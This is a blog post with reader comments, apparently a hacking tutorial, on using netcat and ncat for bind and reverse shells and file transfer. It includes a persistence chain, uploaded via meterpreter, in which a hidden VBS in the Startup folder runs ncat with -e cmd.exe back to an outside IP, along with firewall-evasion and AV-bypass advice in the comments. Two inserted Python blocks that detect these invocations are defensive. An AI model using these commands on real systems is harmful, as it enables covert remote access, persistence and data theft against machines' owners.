control – netcat

Netcat 1.10
===========

Netcat is a simple Unix utility which reads and writes data
across network connections, using TCP or UDP protocol.
It is designed to be a reliable "back-end" tool that can
be used directly or easily driven by other programs and
scripts.  At the same time, it is a feature-rich network
debugging and exploration tool, since it can create almost
any kind of connection you would need and has several
interesting built-in capabilities.  Netcat, or "nc" as the
actual program is named, should have been supplied long ago
as another one of those cryptic but standard Unix tools.

     /\_/\
    / 0 0 \
   ====v====
    \  W  /
    |     |     _
    / ___ \    /
   / /   \ \  |
  (((-----)))-'
   /
  (      ___
   \__.=|___E

Windows 
C:\Documents and Settings\host\Desktop>nc -lvvp 4444 -e cmd.exe

Linux
root@bt:~# nc -v 192.168.1.2 4444
10.255.245.136: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.2] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\host\Desktop>

------------------------------------------------------------

Windows

C:\Documents and Settings\host\Desktop>nc -lvvp 4444
listening on [any] 4444 ...

Linux

root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash
10.255.245.136: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.4] 4444 (?) open

Back on the Windows machine, type ifconfig; it runs in the Linux shell that has connected back.

C:\Documents and Settings\host\Desktop>nc -lvvp 4444
listening on [any] 4444 ...
192.168.1.4: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.255.245.136] from (UNKNOWN) [192.168.1.4] 59987: NO_DATA

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:01:02:03:04:05
          inet addr:192.168.1.4  Bcast:10.255.245.255  Mask:255.255.255.0

------------------------------------------------------------
To make a Windows machine connect back to the BackTrack machine:

Open a terminal and type in nc -lvvp 80

root@bt:~# nc -lvvp 80
listening on [any] 80 ...

Then, on the Windows machine, typing the following will make it
dial back to your machine.

ncat -v your-ip-address 80 -e cmd.exe

C:\Program Files\Nmap>ncat -v your-ip-address 80 -e cmd.exe
Ncat: Version 6.00 ( http://nmap.org/ncat )
Ncat: Connected to your-ip-address:80.

The Windows machine should now have connected to you;
you should be able to see this in the open window on your BackTrack machine.
==============================================

Once connected, you may want to send files back from the Windows machine to BackTrack.

Open a new window in BackTrack and type in

ncat -v -lp 2223 > test-doc.txt

root@bt:~# ncat -v -lp 2223 > test-doc.txt
Ncat: Version 5.61TEST4 ( http://nmap.org/ncat )
Ncat: Listening on :::2223
Ncat: Listening on 0.0.0.0:2223

In the window that has the connection to the Windows machine,
move to the directory that has the file you want and type in

ncat --send-only your-ip-address 2223 < test-doc.txt

C:\Program Files\Cisco Systems\VPN Client\Profiles>ncat --send-only your-ip-address 2223 < test-doc.txt
ncat --send-only your-ip-address 2223 < test-doc.txt

Then go to your root folder in BackTrack and look for the file
you moved across; here it was called test-doc.txt.

You can move any file, not just .txt!

==============================================
Linux - Linux

root@bt:~# nc -lvvp 4444

root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash
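The same invocations seen from the defender's side: an added example, not code from the original post, that classifies nc/ncat command lines the way a process-creation log (Sysmon event 1, auditd execve) would record them, so the bind-shell, reverse-shell and file-transfer patterns above can be alerted on. The sample command lines are constructed from this page; the flag names are netcat's and ncat's own.

```python
"""Classify nc/ncat command lines from a process-creation log so the
bind-shell, reverse-shell and file-transfer invocations can be alerted on."""
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # attach a program to the socket
ALERT_LABELS = {"bind-shell", "reverse-shell", "file-transfer"}

def classify_nc(cmdline):
    """Return 'not-netcat', 'bind-shell', 'reverse-shell', 'file-transfer',
    'listener' or 'client' for one command line."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keeps C:\ paths intact
    except ValueError:                              # unbalanced quote
        argv = cmdline.split()
    if not argv:
        return "not-netcat"
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return "not-netcat"
    args = argv[1:]
    # -l is normally fused with other short flags (-lvvp 4444, -lp 2223)
    listening = any(a.startswith("-") and not a.startswith("--") and "l" in a[1:]
                    for a in args)
    executes = any(a in EXEC_FLAGS or a.startswith(("--exec=", "--sh-exec="))
                   for a in args)
    # --send-only/--recv-only, or a shell redirection if the logger captured it
    transfer = bool({"--send-only", "--recv-only", "<", ">"} & set(args))
    if executes:
        return "bind-shell" if listening else "reverse-shell"
    if transfer:
        return "file-transfer"
    return "listener" if listening else "client"

def triage(cmdlines):
    """Return [(label, cmdline)] for the command lines that deserve an alert."""
    hits = [(classify_nc(c), c) for c in cmdlines]
    return [h for h in hits if h[0] in ALERT_LABELS]

# Constructed sample: the commands from this page plus one benign process.
SAMPLE_CMDLINES = [
    r"nc -lvvp 4444 -e cmd.exe",                          # Windows bind shell
    r"nc -v 192.168.1.2 4444",                            # plain client
    r"nc -v 192.168.1.4 4444 -e /bin/bash",               # Linux reverse shell
    r"ncat -v your-ip-address 80 -e cmd.exe",             # dial-back over port 80
    r"ncat -v -lp 2223 > test-doc.txt",                   # receiving a file
    r"ncat --send-only your-ip-address 2223 < test-doc.txt",
    r"C:\ncat.exe -v 10.255.245.135 443 -e cmd.exe",      # contents of nc.bat
    r"notepad.exe C:\Users\test\Notes",                   # benign
]
```

Real process-creation logs do not carry shell redirections, so the `<`/`>` check only fires when the collector records the full shell line; the `--send-only` check does not depend on that.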

==============================================

Continued AV bypass testing.

Testing with Win 7.

We're not ready to release the initial exploit that helped get us to a meterpreter session.

If honest, because it does not trigger under any AV.

Once exploited, uploading the files listed below does not trigger AV.
All files can be found by installing nmap on a Windows machine. Open the installed folder and copy out what you require.

meterpreter > upload /root/nmap/ C:\
[*] uploading : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploaded : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploading : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploaded : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploading : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploaded : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploading : /root/nmap//Notes -> C:\\Notes
[*] uploaded : /root/nmap//Notes -> C:\\Notes
[*] uploading : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploaded : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploading : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploaded : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploading : /root/nmap//nmap.exe -> C:\\nmap.exe
[*] uploaded : /root/nmap//nmap.exe -> C:\\nmap.exe

————————————————————
nc.bat script:

C:\ncat.exe -v 10.255.245.135 443 -e cmd.exe

VBS.vbs, the script used to run nc.bat invisibly:

Set WshShell = CreateObject("WScript.Shell" )
WshShell.Run chr(34) & "C:\nc.bat" & Chr(34), 0
Set WshShell = Nothing

————————————————————
Gaining a shell so we can move VBS.vbs to the Startup folder, making the script trigger each time the user logs in.

meterpreter > execute -f cmd.exe -c
Process 3176 created.
Channel 8 created.

meterpreter > shell
Process 3864 created.
Channel 11 created.
Microsoft Windows [Version 6]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\test\Documents>move C:\VBS.vbs "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

1 file(s) moved.

————————————————–

Rebooting the Win 7 box to test if the start up script works.

C:\Users\test\Documents>shutdown -r -t 0

————————————————–

Back on BackTrack, open a new terminal and set up the nc listener.
Once the person reboots and logs back into the account, VBS.vbs will run.

root@bt:~# nc -lvvp 443
listening on [any] 443 ...
Remote-IP: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.255.245.135] from (UNKNOWN) [Remote-IP] 49156
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
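How a defender would find the persistence chain just described, as an added example that is not part of the original post: it walks a per-user Startup folder (simulated in memory, with the post's own two scripts as constructed file contents), follows each .vbs launcher to the script it runs with window style 0, and reports any netcat invocation that attaches a program to the connection. The STARTUP path and file names are taken from the page; the .lnk entry is a constructed benign item.

```python
"""Inspect a per-user Startup folder for the launcher chain shown above
(VBS.vbs -> nc.bat -> ncat -e cmd.exe). Folder and files are simulated."""
import re

STARTUP = r"C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed disk state (path -> contents), copied from the post's scripts.
FILES = {
    STARTUP + r"\VBS.vbs": (
        'Set WshShell = CreateObject("WScript.Shell" )\r\n'
        'WshShell.Run chr(34) & "C:\\nc.bat" & Chr(34), 0\r\n'
        'Set WshShell = Nothing\r\n'),
    r"C:\nc.bat": "C:\\ncat.exe -v 10.255.245.135 443 -e cmd.exe\r\n",
    STARTUP + r"\OneDrive.lnk": "",   # benign shortcut, ignored
}

# WshShell.Run "target", windowstyle  (style 0 = no window shown)
RUN_RE = re.compile(
    r'\.Run\s+(?:chr\(34\)\s*&\s*)?"([^"]+)"(?:\s*&\s*chr\(34\))?\s*,\s*(\d+)',
    re.IGNORECASE)
# nc/ncat with -e or -c, i.e. a program attached to the connection
NC_RE = re.compile(r'\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-[ec]\s', re.IGNORECASE)
ENDPOINT_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b')

def run_targets(vbs_text):
    """Return [(target, window_style)] for each WshShell.Run in a .vbs."""
    return [(m.group(1), int(m.group(2))) for m in RUN_RE.finditer(vbs_text)]

def remote_endpoint(cmd):
    """(ip, port) the netcat command dials out to, or None."""
    m = ENDPOINT_RE.search(cmd)
    return (m.group(1), int(m.group(2))) if m else None

def scan_startup(files, startup_dir):
    """One finding per Startup item that runs netcat, directly or via a .vbs."""
    findings = []
    for path, text in files.items():
        low = path.lower()
        if not low.startswith(startup_dir.lower() + "\\"):
            continue
        targets = []                          # (target path, command text, hidden?)
        if low.endswith(".vbs"):
            targets = [(t, files.get(t, ""), s == 0) for t, s in run_targets(text)]
        elif low.endswith((".bat", ".cmd")):
            targets = [(path, text, False)]
        for target, cmd, hidden in targets:
            if NC_RE.search(cmd):
                findings.append({"launcher": path, "target": target, "hidden": hidden,
                                 "remote": remote_endpoint(cmd), "command": cmd.strip()})
    return findings
```

On a live host the same logic applies to the all-users Startup folder and to the Run keys, with `files` built from the real directory listing instead of the constructed dict.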

Updates

https://myexploit.wordpress.com/control-netcat-av-bypass/

6 thoughts on "control – netcat"

    1. Hi Andrej, thanks for the question, I appreciate that you read the blog. Quick reply: yes, it should work. If on the Windows machine you typed

      ncat -v your-machines-ip-address 80 -e cmd.exe

      The windows machine will connect out on port 80 http so will look just like normal internet traffic. Firewalls normally do not block http. Exception on this is larger estates that use a proxy and there internal Firewall only allows access for the proxy out to the internet.

      Try tunneling all your traffic over port 80. On a different note, you could change the FW or turn it off once you have access via ncat anyway.

      Give it a try. With regards to OS, netcat doesn't care whether it is Windows XP, Vista, 7 or Linux.

      It's a very good tool.

  1. Thank you for your reply:
    It’s working :
    My Test:

    1.NetCat – test – Windows Vista Home Basic SP1 FireWall is On
    c:\tools>nc -l -v -p80 -e cmd.exe
    listening on [any] 80 …
    192.168.235.10: inverse host lookup failed: h_errno 11004: NO_DATA
    connect to [192.168.235.1] from (UNKNOWN) [192.168.235.10] 34431: NO_DATA

    2.VMware – BackTrack 5R2

    root@bt:~# nc -v 192.168.235.1 80 –
    192.168.235.1: inverse host lookup failed: Unknown server error : Connection timed out
    (UNKNOWN) [192.168.235.1] 80 (www) open
    Microsoft Windows [Wersja 6.0.6002]
    Copyright (c) 2006 Microsoft Corporation. Wszelkie prawa zastrzeżone.

    c:\tools>dir
    dir
    Wolumin w stacji C to OS
    Numer seryjny woluminu: 6892-B5E7

    Katalog: c:\tools

    ———————————————————————————————
    But – The Windows firewall detects and, by default, blocks programs from opening
    TCP/IP sockets and listening for incoming connections.
    How do I add exceptions to the firewall ???
    I can’t find good “exploit” for windows vista 🙂 It is a fortress ??? 🙂

    1. Great to see you testing. For adding exceptions to Windows firewall please look at

      http://www.myexploit.wordpress.com/control-windows-firewall-from-the-command-line/

      A quick example below should allow port 80 in on Win 7 so should work on vista?

      netsh advfirewall firewall add rule name=”Open Port 80″ dir=in action=allow

      You could change the port number to any you require.

      With regards to exploiting Vista/Win7 we are in full agreement it's been improved and is now hard to exploit. Best way is to look at exploiting the apps on it. Browsers are still very exploitable. Try this example in your lab.

      http://www.myexploit.wordpress.com/control-metasploit-browser_autopwn/

    1. Hi Andrej no problem happy you looked at the blog.
      Forget the metasploit ms08_067_netapi exploit; the buffer overflow was fixed with an update for XP and by default in Vista onwards. So no joy with Win 7.

      Conficker uses the ms08_067_netapi exploit, so as you can imagine a larger percentage of estates have now defended against it. As they should! Also it's rare to find port 445 open on the outside.

      With regards to Win7 exploit have a go at

      http://www.myexploit.wordpress.com/control-respect-to-armitage1989/

      This will slip past AV and works against Win7
